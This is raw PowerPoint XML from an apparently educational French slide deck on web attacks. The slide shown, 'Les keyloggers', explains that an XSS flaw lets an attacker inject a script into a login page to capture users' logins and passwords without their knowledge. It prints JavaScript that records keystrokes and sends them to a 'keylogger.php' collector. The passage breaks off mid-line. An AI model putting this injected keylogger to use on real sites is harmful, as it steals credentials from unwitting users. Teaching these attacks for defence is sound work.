            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19512E10-9F0C-4D01-97C7-63D745657235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5815243" y="1929947"/>
            <a:ext cx="5885143" cy="3590574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="515365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7642019-2D73-45D8-8F15-974B8C29FC2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="446807"/>
            <a:ext cx="8001000" cy="842750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les keyloggers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="ZoneTexte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4305D5AE-0AFC-4088-AC73-1797467AE6CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="1658217"/>
            <a:ext cx="10631488" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i l’on découvre une faille XSS dans un site internet, il sera assez facile d’y injecter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> bout de code sur une page de login par exemple. On pourra  ainsi collecter l’ensemble des logins/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> saisi au clavier par les utilisateurs à leur insu.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05D04057-0D7D-4AAE-BFC5-006834E4B7CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049133" y="2834640"/>
            <a:ext cx="4950823" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    var keys='';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.addEventListener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keyup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(e) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>event</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getc.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getc.keyCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getc.charCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="50FA7B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fromCharCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(key);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>+=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>key;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>window.setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8F8F2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8BE9FD"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF79C6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8F8F2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keylogger.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F1FA8C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E9F284"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
